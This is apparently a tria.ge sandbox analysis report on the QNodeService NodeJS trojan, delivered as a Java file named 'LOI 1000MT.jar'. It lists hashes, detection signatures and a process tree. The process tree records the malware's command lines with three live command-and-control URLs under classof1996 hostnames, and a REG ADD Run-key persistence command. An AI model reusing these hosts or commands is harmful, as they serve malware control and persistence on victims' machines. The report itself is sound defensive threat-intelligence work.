Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
128s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
07/07/2020, 09:04
Static task
static1
Behavioral task
behavioral1
Sample
LOI 1000MT.jar
Resource
win7v200430
Behavioral task
behavioral2
Sample
LOI 1000MT.jar
Resource
win10v200430
General
-
Target
LOI 1000MT.jar
-
Size
12KB
-
MD5
f5f8a528c5825a1fa032327e128c5320
-
SHA1
b43c86e9d2f3cce0766257e44122fe2216365b05
-
SHA256
dcb9f8cbe1da85545179a3c9a0f6c84f9ad0c4612d2e4ae6b4320ee35d041396
-
SHA512
01db263883a1b1da27963eb574fd4d05f0c1283f8d2b44b65cd4a876eb36b03d782e8e1fd6c422bdd1097802e36fd8aef91e01ade1ea540f4e5c3b9ff034f015
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 812 node.exe 1708 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfb5-118.dat family_qnodeservice -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 wtfismyip.com 14 wtfismyip.com -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-1efed896 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-1efed896.cmd\"" reg.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3216 wrote to memory of 812 3216 java.exe 73 PID 3216 wrote to memory of 812 3216 java.exe 73 PID 812 wrote to memory of 1768 812 node.exe 74 PID 812 wrote to memory of 1768 812 node.exe 74 PID 1768 wrote to memory of 2952 1768 cmd.exe 75 PID 1768 wrote to memory of 2952 1768 cmd.exe 75 PID 812 wrote to memory of 1708 812 node.exe 76 PID 812 wrote to memory of 1708 812 node.exe 76 -
Loads dropped DLL 4 IoCs
pid Process 1708 node.exe 1708 node.exe 1708 node.exe 1708 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1708 node.exe 1708 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\LOI 1000MT.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://classof1996.duckdns.org --central-base-url https://classof1996.spdns.org --central-base-url https://classof1996.theworkpc.com2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-1efed896" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-1efed896.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-1efed896" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-1efed896.cmd\""4⤵
- Adds Run entry to start application
PID:2952
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://classof1996.duckdns.org --central-base-url https://classof1996.spdns.org --central-base-url https://classof1996.theworkpc.com3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
PID:1708
-
-